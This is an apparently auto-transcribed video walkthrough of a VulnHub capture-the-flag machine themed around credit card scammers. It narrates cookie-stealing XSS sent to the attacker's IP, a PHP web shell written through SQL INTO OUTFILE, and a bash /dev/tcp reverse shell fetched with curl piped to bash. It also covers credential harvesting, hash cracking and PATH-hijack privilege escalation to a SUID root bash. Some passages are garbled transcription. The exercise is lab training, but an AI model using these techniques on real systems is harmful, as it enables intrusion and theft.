Hey, what's up, everybody? Thanks for joining today. We're gonna be routing this box credit card scammers 1. So I hope you guys liked it. I think there's a really interesting theme behind this. And right after doing our nmap scan, as always, tag pn to tell nmap the host is already up and running SVC to perform a service version detection scan plus well, we can run some default scripts for each service file. For example, in here for HTTP, it's executing several scripts to detect the methods, the server header, and the title. For example, I'll go with 443 and SSH and whatever you want. And we're using tag N to disable DNS resolution, tag V just to see more information on the go, plus T5 just to tell nmap to do it like as fast as it can inside the default templates. That's why you have tag T1 to 5, right? And we save it on a file called general under the nmap directory and all ports, and that's all. So we found this, right? Now we want to go here to the e-commerce. We see it's selling PPE, which stands for personal protective equipment, if I'm not wrong. And obviously we want to fire up our burp suite here just to test several things with this kind of mechanism. But in this case, we're just gonna be doing it like in a speed run way, right? So again, you always want to intercept this request, try SQL injection, a lot of other things. And in this case, the right way to get past this stage is to test cross-site scripting and seeing if we can like have the page reach to us in another in a web server, right? So we can do something like this. I just do this and start a HTTP server from Python, super basic. And in order to access payload, I just write down what we're going to be executing on the website. So we're going to be using this script tag, right? And we want, for example, here to create an image. There are a couple of other ways to do this. And to image, we're gonna be using the source attribute, and then HTTP 192.168.168.66.101. That's my IP. We're using something like to take care of our OPSEC, like avatar site JPG, and we can say, for example, dimensions, and right here we're going to be appending a document.cookie, right? Now I like to do something like this, and I'm going to say, I don't know, dimensions color whatever equals and plus document dot location. And that's it. I'm gonna be ending it with a semicolon. So document dot location, document dot cookie. That should work for us. And if we cat XSS payload and then copy it, we can just start injecting it in every single text box. Here. Now, obviously, well, the history behind this, I didn't mention it. You haven't read the VulnHub entry page is that these guys here are scammers, just as the name of the machine indicates. And yeah, basically they're collecting their customers' credit card information. So it's not impossible to think that maybe there's someone behind the stage, right? Looking at this information, so we can like have them read or injected code, that we might get something interesting, and we do, right? So with this, we're seeing that we're sending a dimensions, which is this. Let me just open that up, zoom it up, and we can use this. Oh, well, actually, let me see the location, which is /admin dist and index. Obviously, we would have found like this site anyway, with some checklist list basically, and we're here just checking every folder to see if there's something interesting in there. And we see here we have a login page. Okay, so I think this is the right moment to inject your stolen cookie. Let me just index, or whatever it is, test. Let's let it like redirect us, and we do have access to the admin panel, right? We have this super interesting. We have access now, and what can we see here? Look at that. Okay, we have a lot of entries in here, tons of information, obviously, like credit card numbers in here. Oh god, let me just zoom it down. Well, I see date, the expiration date of the car, and the CVC, I don't remember how was it called. Okay, so that is interesting. These guys are so dishonest people. So cool. Let me just normalize this, please. I have a database admin right here now. What is Wapalizer saying about this? Using Apache, char.js, PHP 7.2.11. Obviously, you wanna look for some kind of vulnerability PHP that version has. Now look at this. Here we can like try a lot of things, basic injection, like comments and something that may trigger an error, but that won't work. Okay, and you can, well, this couldn't be SQL injection, but you want to know some basic SQL queries, like to query basically every table. For example, select information schema from information schema .schemata and all this stuff. But at the end, and then you guys are seeing this because you want to see the answer. If you get stuck, this is what we're gonna do. There's a sentence here we can select whatever and send it into an out file with into out file, and then we just need to specify a route that we want the file to be now. Obviously we want to append like the regular way files or websites are stored in Apache, which is var www.html and something here, unless they have an intermediary directory, right? But this is the first try we want to try. So what are we going to inject in that file? We can do literally whatever we want, like hello HTML tags, whatever. But in this case, we want to get remote code execution. Now, what we want to try here is like this. Yep, and this PHP, right? Then I want to get echo 3 to pre-formatted statements. Let's concatenate it with a dot. Let's, for example, shell exec, or we can go with system. Let me just go with that first. System something, right? Let's now concatenate that to the closing tag for pre-formatted, and that's it. Basically, we can just end it here with a semicolon again, and what we're executing inside system is we're gonna be executing a system, a get, and something which is gonna be, for example, cmd. Right now, I'm gonna copy that. I'm gonna be executing it, and now I can, for example, come up here. Let's just move that to another window, and let's, for example, pound.php, I think it was, cmd equals id, and look at that. We do have remote command execution through a specially crafted SQL query, which is not SQL injection by itself or per se, but it works, as you can see. I want to see if I can like chain multiple commands. I mean, it looks like the format didn't work as expected, but I can hit Control U, and that will be super. Look at this, super well organized for now. So cool. In order to get our reverse shell, I like to try something basic, something easy, just for the moment. And I'm gonna be created a index.html file, but I'm gonna be treating it as a shell script thing. So I can go with bin bash, and in the command line version, I'm gonna go with bash interactive mode redirections def tcp 192.168.156 or 56.101 over port 4441. Let's redirect all that. Cool, right? So we have now an index.html file, and we're gonna be using a server over 80. Cool. So let me ask the server something. Do we have curl installed? Which curl? Apparently we do not. Or which curl, which delegate, which ls, for example. Which NC, I'm not seeing. Like, maybe just writing here. But which curl? That is interesting. I'm not seeing any kind of information in here. Which? I'm not pretty confident about it. What I'm gonna be doing is curl 192.168.56.101. Let me just do that. And well, indeed we do. I mean, it's doing the curl function, which is query the contents of the file. And since there's no file here, like indicated previously, it's gonna be querying for the index.html file. We do have it right here, right? Oh my god, sorry. This is actually the XSS thing. But yeah, we see it's querying it. It's like where, let me see that. Not found. Here. Look at this. So it's getting the root file, which is index.html. That's why, since it exists, it's returning a 200 status code, which is success, right? So what about we pipe in bash to these contents? This will effectively do have bash, like interpreting all this content that is actually executing a reverse shell back to us. Let's do that right now. And look at that, it's thinking. So it should have worked, right? 56101. Oops. Did it work or what? IPA 101. C bash. Noel 444. That is interesting. It should have worked. Okay, let me just curl once again. Curl. And it's working. Let me use a port like 443. Maybe 444 is not allowed for inbound connections or outbound connectivity. Oh, God. Okay, it looks like that will work. 443. And once again, bash. Wait. In here. This is not working as expected, honestly. But yeah, look at that. Now we have our axis here, right? So let me just normalize this. Script def null, c bash. And I'm just gonna be stty row minus echo semicolon foreground. Then let's just restart x term. Let's export term as x term. That's it. Now, now that we are here, let me cat, for example, by now, which was the PHP page we were seeing before. Basically, the one we sent our payload at, right? And why do I want to check this? Because, well, look at this. It's actually grabbing first name, every possible argument, like right off the post request. I mean, it's not being standardized at all, and it's storing it into the database just like it is. Now, in order to have, look at this, settings and config, you have two interesting files in here in class database. So let me just cat this and look at that. We have interesting information here. Let me just nano creds, and I'm gonna be orders and this password, right? So let me, for example, MySQL u orders p like this, and we're in. Let me just show databases. Let's use orders. Let's show tables from orders. Let's select everything from users, for example. And look at that, we have 2 hashes. That is nice. Now I want to check something here because I want to see how many users do we have that are system accounts. Now I'm going to be grabbing sh, whatever it ends from for sh. Now we have both of these. Now admin, as far as I know, is uncrackable. Like the original password is not in the rock.txt, but this one is. So nano hash. Let me time John because I want to see how long does John take to crack this one. And world list user share world instruction. Let's go with that. Let's just wait a bit. In the meantime, we clearly can. Oh my god. No. Failed. God. Let me just script def null c bash. God, no. exit, reset. Let me grab it again, like in Team BLP, and like that. Oh god, yeah, that's just great because I don't have the HTTP server like started up, so that will be cool anyways. Let's see how much it takes to crack it. And the meantime, actually, let me maybe open up another one. And contents, was it? Exploits? Yeah, let me see. Maybe go there. HTTP server on 80, port 80 at 8. And let's grab it again. And there you go. So cool. I'm not gonna be normalizing it again because it's from Apache server. Let's just wait until John has cracked the hash. And we can go and look out what's on the root directory. We can start looking, for example, well, seeing some unusual files and folders like downloads, which shouldn't be on the root directory, which we can see mount, opt, lsla, for example, scripts. That is interesting. However, it says not in scope of CTF, please. XSS.py. I mean, I think this XSS.py must be the script in charge of having it look at the index page here in the admin side, just to make or have the injected XSS code executed right. So yeah. What else? Obviously, we can start finding some SUID files. Let's see what's up. Let me just close the HTTP server. We have user mount, change, gpass LED mount, pkexec that probably will let us escalate our privileges by exploiting the pollkit, but I'm pretty confident this is not the official way to do this. We have cron tab, sudo pass LED backup. This is interesting. I haven't seen before a binary like by default called backup. So let us take a look at it. Remember that you can actually, oh my god, once again, sorry for that. You can let me grab it again. You can like execute a certain command over every found item with find, like this one. So you can exec over every found binary. For example, a command like lstack.la. I want to do this with the brackets and then escape the semicolon, then redirect the yours to def null and all the stuff, and that's cool. So now we have that backup. It's being executed by root, and which want to see this, which backup. Okay, let me just once again do this, and I want to do a cat command over this one. Now I'm not seeing any useful information here. Let me just clean this up a little bit, and I want to go with strings now. Okay, remember, strings will let you read every human readable string on a binary, so that you can have an idea of what the binary is doing. So look at this, it's setting a UID probably to root, and it's executing a binary in home money grabber backup.sh. So every time one executes this program backup as root, it's at the very same time executed another shell script, which is this one. So we're gonna see it later. And yeah, obviously since it's on MoneyGrabber's home folder, we're not able to see it yet. And I'm just gonna speed it up for you guys. Actually, I think the password is Delta1. Let me try that. To MoneyGrabber Delta1. If it's not, it's just Delta. Probably not. Oh, look at that. We're here. So let me just go with script def null, cd bash, and just like that. That's gonna be cool. Just for now. Now we're in our home. We can see here flag2.txt. Flag1, as I just remembered, is one directory down from where we spawned our shell. So this is the flag2. That's cool. Now look at this. We have the backup here, backup.sh. And look at this, pretty interesting. It's using tar xcf to create a MySQL that tar to everything that is in var lib MySQL, and it just sleeps for 30 seconds. Now the interesting thing here is it's using tar, but not with its absolute path, but a relative one, which is whatever you want. Now you gotta understand, there's always a specific order your system finds binaries to execute from. By default, the very first every time any path is on the path variable, which is this one, is going to execute at first the home MoneyGrabber, right? Look at this, home MoneyGrabber, and but it's obviously just using home MoneyGrabber.local bin and home MoneyGrabber.ban. Now we need to create like a tar malicious script to have the Linux system execute our malicious binary or tar command first. In this case, I'm gonna do something like echo. Now export. Let's create path, which first or current location. Sorry for that. Current location, and then fill it up with the current value of the path. Right now, if I now echo path out, I'm gonna see first is home MoneyGrabber, then home MoneyGrabber.local.bin, .local/bin, and then home MoneyGrabber ban, which is different, and all the stuff. Okay, cool. And look at that. After 500 seconds, how much is that? Like 10 minutes probably. We have a Delta1 password. Cool. So I'm gonna just proceed from here, and I'm gonna be creating a tar inc. Cool. Wait. For term as xterm, nano tar, and look at that. Cool. So let's go with bash, and in order to do this, I wanna chmod u plus s, which is the user field to add it with a sticky bit to bash. Okay, I want to do that. Oh god, what happened there? No way. Show MoneyGrabber Delta1, and cool. Okay, script fnull cbash. Okay, script fnull cbash. Okay, now let me just do something like this and bash to tar. touch tar. Super uncomfortable here. Can I? Oh my goodness. Delta 1. Oh. So cd script def no cd bash. What? C bash. And cool. Let me just cat tar out. Okay, so cat. Let me just try that bin bash. Tar. Cat tar. Cool. So let's now chmod u plus s bin bash and send that again to tar. So cut tar. Oh my god. It was actually which set? Oh, cut tar set. I'm just trying to remediate some things here. So chmod u plus x and bash, change it. Change it to chmod u plus s bin bash. Oh man, whatever. I'm just a little bit stressed out because of the shell we have. we cannot even open nmap without having it logged freezed. Cool. Now chmod u plus s bin bash, right? And tar, cut tar. Cool. We have that. Now let's give it execution permissions to the tar or tar file. Now let's execute user bin backup. Alright guys, so I had a little bit of trouble back there with the commands just because the bash is somewhat kinky. But here we go. So I just executed this with path. Every time I resetted the like my shell, I had to export the path. And yes, that's it. So now we have the original bin bash with a sticky bit set. Now, how do we like call the bin bash? Because if we do something like this, it's not gonna do it like Apache, right? Now we can exit out and we can use bin bash with the tag p. I encourage you to do something like man bash and look for p, probably, I don't know. Maybe we can see it over there. Tag p. Well, I don't see it like in here. There's definitely a parameter tag p. I don't remember like exact function it did or even the name that it received, but if you do this, you will be able to execute id as the effective user id set to root. Now you can execute basically every root task. Every task. So if you root cat root flag 3.txt, you're gonna see the root flag. And that's it for all today. I hope you guys liked it. I'm really sorry for the inconvenience. It was a very interesting machine though. A lot of to think of it. So yeah, do not forget to leave your like and subscribe if you like the content, and I'll see you later.